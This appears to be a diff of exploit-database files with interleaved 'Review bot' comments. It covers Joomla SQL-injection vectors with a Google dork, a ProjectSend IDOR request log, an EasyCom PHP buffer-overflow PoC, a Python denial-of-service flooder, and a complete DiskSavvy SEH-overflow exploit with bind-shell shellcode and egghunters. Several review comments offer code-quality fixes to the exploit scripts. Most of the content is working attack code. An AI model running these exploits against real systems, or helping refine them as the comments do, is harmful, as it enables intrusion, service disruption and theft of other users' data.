# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
|
||||
# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
|
||||
# # # # #
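Review bot: The second URL contains `isbn=on'` with a stray single quote that is not marked `[SQL]`; if it is a leftover from testing it should be removed, and if it is a second injection point it should be marked explicitly, since as written a reader cannot tell which parameter produced the result. The first vector, `task=suggestion&comment=[SQL]`, takes free text, so it cannot be fixed by whitelisting and needs a parameterised query. No probe or response is recorded for either vector.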
|
18
platforms/php/webapps/41431.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_booklibrary
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
|
||||
# Demo: http://ordasvit.com/joomla-media-library/
|
||||
# Version: 3.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
|
||||
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
|
||||
# # # # #
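Review bot: The `Google Dork` line is `inurl:index.php?option=com_booklibrary`, carried over from the BookLibrary advisory, whereas this file concerns MediaLibrary; it should read `inurl:index.php?option=com_medialibrary` or be dropped. Both vectors are SEF paths with the demo's menu id (`/345/`); the first injects into a numeric book id (`19[SQL]`) and the second into an array element (`mid[0]=[SQL]`), so the fixes differ: cast the id to int, and validate every element of `mid[]`, not only the first. No probe or response is shown for either.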
|
157
platforms/php/webapps/41433.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
Document Title:
|
||||
===============
|
||||
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2031
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-02-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2031
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets
|
||||
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending
|
||||
on external services or e-mail to send those files.
|
||||
|
||||
(Copy of the Homepage: http://www.projectsend.org/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-02-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
GNU GPL License
|
||||
Product: ProjectSend r754
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input.
|
||||
As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References
|
||||
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point
|
||||
to other client account names, which allows an attackers to download others clients private data with no secure method provided.
|
||||
|
||||
Vulnerability Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] process.php?do=zip_download
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] client
|
||||
[+] file
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
|
||||
|
||||
2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension
|
||||
|
||||
--- PoC Session Logs ---
|
||||
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://localhost/ProjectSend-r754/my_files/
|
||||
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
|
||||
Connection: keep-alive
|
||||
-
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 05 Feb 2017 19:07:41 GMT
|
||||
Server: Apache/2.2.22 (Debian)
|
||||
X-Powered-By: PHP/5.4.44-0+deb7u1
|
||||
Expires: Sat, 26 Jul 1997 05:00:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
Content-Length: 6
|
||||
|
||||
Name of Files: .jpg
|
||||
|
||||
|
||||
Video PoC:
|
||||
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
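Review bot: The title calls this an "Authentication Bypass", but the session log shows an authenticated low-privilege session (`Cookie: PHPSESSID=...`) changing the `client` and `files[]` values, which is an authorization (IDOR) failure rather than an authentication one; the title and the index entry should say authorization. The server-side fix is for `process.php?do=zip_download` to take the client identity from the session and verify that every id in `files[]` is assigned to that client before adding it to the archive, instead of trusting the `client` parameter; the advisory has no solution section at all. The evidence shown is a 6-byte `text/html` response reading `.jpg`, which is thin; a response demonstrating that another client's file was actually delivered would make the finding stand on its own.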
|
||||
|
||||
|
167
platforms/windows/dos/41425.txt
Executable file
|
@ -0,0 +1,167 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
================
|
||||
easycom-aura.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===========================
|
||||
EASYCOM AS400 (iBMI) PHP API
|
||||
EasycomPHP_4.0029.iC8im2.exe
|
||||
|
||||
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
|
||||
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
|
||||
Windows, Linux, and IBMi.
|
||||
|
||||
|
||||
EasyCom tested here requires older version of PHP.
|
||||
|
||||
Setup test environment:
|
||||
|
||||
Windows 7
|
||||
XAMPP 1.7.3
|
||||
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
|
||||
Copyright (c) 1997-2009 The PHP Group
|
||||
Zend Engine v2.3.0
|
||||
|
||||
PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=========================
|
||||
API Stack Buffer Overflow
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5358
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
|
||||
Below I provide some proof of concept details for a few of them.
|
||||
|
||||
|
||||
EAX 00000000
|
||||
ECX 41414141
|
||||
EDX 771D6ACD ntdll.771D6ACD
|
||||
EBX 00000000
|
||||
ESP 00C0F238
|
||||
EBP 00C0F258
|
||||
ESI 00000000
|
||||
EDI 00000000
|
||||
EIP 41414141
|
||||
|
||||
C 0 ES 002B 32bit 0(FFFFFFFF)
|
||||
P 1 CS 0023 32bit 0(FFFFFFFF)
|
||||
A 0 SS 002B 32bit 0(FFFFFFFF)
|
||||
Z 1 DS 002B 32bit 0(FFFFFFFF)
|
||||
S 0 FS 0053 32bit 7EFDD000(FFF)
|
||||
T 0 GS 002B 32bit 0(FFFFFFFF)
|
||||
D 0
|
||||
O 0 LastErr ERROR_SUCCESS (00000000)
|
||||
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
|
||||
|
||||
|
||||
SEH chain of main thread
|
||||
Address SE handler
|
||||
00C0F354 kernel32.7600410E
|
||||
00C0FF78 42424242
|
||||
52525252 *** CORRUPT ENTRY ***
|
||||
|
||||
WinDbg dump...
|
||||
|
||||
(720.a70): Access violation - code c0000005 (first/second chance not available)
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
|
||||
eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
|
||||
eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
|
||||
41414141 ?? ???
|
||||
0:000> !load winext/msec
|
||||
0:000> !exploitable
|
||||
|
||||
!exploitable 1.6.0.0
|
||||
Exploitability Classification: EXPLOITABLE
|
||||
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
|
||||
called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
|
||||
|
||||
User mode DEP access violations are exploitable.
|
||||
|
||||
|
||||
PHP Crash:
|
||||
=============
|
||||
|
||||
Problem signature:
|
||||
Problem Event Name: BEX
|
||||
Application Name: php.exe
|
||||
Application Version: 5.3.1.0
|
||||
Application Timestamp: 4b06c430
|
||||
Fault Module Name: StackHash_e98d
|
||||
Fault Module Version: 0.0.0.0
|
||||
Fault Module Timestamp: 00000000
|
||||
Exception Offset: 41414141
|
||||
Exception Code: c0000005
|
||||
Exception Data: 00000008
|
||||
OS Version: 6.1.7601.2.1.0.256.48
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
===============
|
||||
php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
|
||||
|
||||
<?php
|
||||
|
||||
/* Basic connection to an AS400 iBMI System */
|
||||
|
||||
$payload=str_repeat("A", 4000); #BOOM!
|
||||
$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100); #SEH
|
||||
|
||||
$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg()); #VULN
|
||||
$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() ); #VULN
|
||||
$conn = i5_private_connect($payload, $user, $password, array()); #VULN
|
||||
|
||||
echo 'EasyCom PHP API 0day ' . $conn;
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
==========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: December 22, 2016
|
||||
Vendor acknowledgement: December 23, 2016
|
||||
Vendor Release Fix/Version February 20, 2017
|
||||
February 22, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
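Review bot: The Disclosure Timeline entry `Vendor Release Fix/Version February 20, 2017` names no fixed build, so a reader assessing CVE-2017-5358 exposure cannot tell which EasyCom release closes the issue; the Product section only gives the affected installer `EasycomPHP_4.0029.iC8im2.exe`, and a line such as `Fixed in: <fixed version, per vendor>` should be added next to it. The affected module name `php_Easycom5_3_0.dll` appears only in the Exploit/POC preamble rather than in the Product section, which is where someone inventorying installs will look. The Security Issue section states there are "multiple Buffer Overflow entry points" but only the three `i5_*connect` functions are listed anywhere; if others are known, naming the functions (without further detail) would make the affected surface clear for defenders.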
99
platforms/windows/dos/41426.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
================
|
||||
easycom-aura.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===========
|
||||
SQL iPlug
|
||||
EasycomPHP_4.0029.iC8im2.exe
|
||||
|
||||
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
|
||||
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Denial Of Service
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5359
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
|
||||
HTTP requests fed to the "D$EVAL" parameter.
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
============
|
||||
|
||||
import socket
|
||||
|
||||
print 'EasyCom SQL-IPLUG DOS 0day!'
|
||||
print 'hyp3rlinx'
|
||||
|
||||
IP = raw_input("[IP]> ")
|
||||
PORT = 7078
|
||||
payload="A"*43000
|
||||
|
||||
arr=[]
|
||||
c=0
|
||||
while 1:
|
||||
try:
|
||||
arr.append(socket.create_connection((IP,PORT)))
|
||||
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
|
||||
c+=1
|
||||
print "doit!"
|
||||
except socket.error:
|
||||
print "[*] 5th ave 12:00"
|
||||
raw_input()
|
||||
break
|
||||
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: December 22, 2016
|
||||
Vendor acknowledgement: December 23, 2016
|
||||
Vendor Release Fix/Version February 20, 2017
|
||||
February 22, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
===========
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
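Review bot: The embedded PoC is Python 2 code (`print` statements, `raw_input`) but nothing in the file says so, and as a .txt it carries no shebang either; a first line `# Requires Python 2.x` would spare readers a failed run under Python 3. The `while 1` loop stores every connection in `arr` and never closes them, and whether holding them open is intentional or incidental is not stated, so a comment on the loop (or a cleanup in the `except` branch) should make that explicit. Operationally, the condition described in the Security Issue section is a single HTTP GET to TCP/7078 with an overly long `D$EVAL` query parameter, which is the trait a monitoring rule for this service would key on; the advisory would be more useful to defenders if it stated whether the vendor fix dated February 20, 2017 corresponds to a specific SQL iPlug version.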
98
platforms/windows/remote/41436.py
Executable file
|
@ -0,0 +1,98 @@
|
|||
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
|
||||
# Date: 2017-02-22
|
||||
# Exploit Author: Peter Baris
|
||||
# Vendor Homepage: www.saptech-erp.com.au
|
||||
# Software Link: http://www.disksavvy.com/downloads.html
|
||||
# Version: 9.4.18
|
||||
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
|
||||
|
||||
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
|
||||
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
|
||||
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
|
||||
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
try:
|
||||
host = sys.argv[1]
|
||||
os = sys.argv[2]
|
||||
port = 80
|
||||
except IndexError:
|
||||
print "[+] Usage %s <host> win7/win10" % sys.argv[0]
|
||||
print "[i] Example: dsavvy.py localhost win10"
|
||||
sys.exit()
|
||||
|
||||
|
||||
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
|
||||
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
|
||||
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
|
||||
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
|
||||
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
|
||||
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
|
||||
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
|
||||
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
|
||||
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
|
||||
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
|
||||
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
|
||||
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
|
||||
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
|
||||
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
|
||||
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
|
||||
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
|
||||
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
|
||||
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
|
||||
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
|
||||
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
|
||||
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
|
||||
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
|
||||
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
|
||||
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
|
||||
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
|
||||
|
||||
crash = "\x41" * 2487
|
||||
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
|
||||
filler = "\x44" * (2505-334-300-100)
|
||||
nseh = "\xeb\x08\x90\x90"
|
||||
stack_fill="\x41"*100
|
||||
nops="\x90"*8
|
||||
egg = "t00wt00w"
|
||||
|
||||
if os == "win7":
|
||||
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
|
||||
"\x33\xd2"
|
||||
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
|
||||
"\x2e\x5a\x3c\x05\x74\xef\xb8"
|
||||
"\x74\x30\x30\x77"
|
||||
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
|
||||
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
|
||||
|
||||
elif os == "win10":
|
||||
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
|
||||
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
|
||||
"\x74\x30\x30\x77"
|
||||
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
|
||||
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
|
||||
|
||||
else:
|
||||
print "[!] This windows version is not supported yet"
|
||||
exit(0)
|
||||
|
||||
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
|
||||
|
||||
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
|
||||
buffer+= "Host: "+host+"\r\n"
|
||||
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
|
||||
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
|
||||
buffer+="Accept-Encoding: gzip, deflate\r\n"
|
||||
buffer+="Referer: http://"+host+"/login\r\n"
|
||||
buffer+="Connection: keep-alive\r\n"
|
||||
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
buffer+="Content-Length: 5900\r\n\r\n"
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect((host,port))
|
||||
s.send(buffer)
|
||||
s.close()
|
||||
|
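Review bot: The assignment `os = sys.argv[2]` in the argument block shadows the standard-library module name, which will trip up anyone who later adds `import os` to this script; renaming it, e.g. `target_os = sys.argv[2]`, and updating the `if os == "win7":` / `elif os == "win10":` comparisons avoids that. The unsupported-version branch prints an error and then calls `exit(0)`, so a wrapper script sees a success status on failure; `sys.exit(1)` is the conventional choice and matches the `sys.exit()` already used in the usage branch. The `filler` expression `(2505-334-300-100)` and the `Content-Length: 5900` header carry undocumented magic numbers, and a short comment naming what each term accounts for would help readers. The header says the WoW64 egghunters work only on specific 64-bit Windows versions, yet the "Tested on" line gives no Windows 10 build number, which seems worth recording given that stated version dependence.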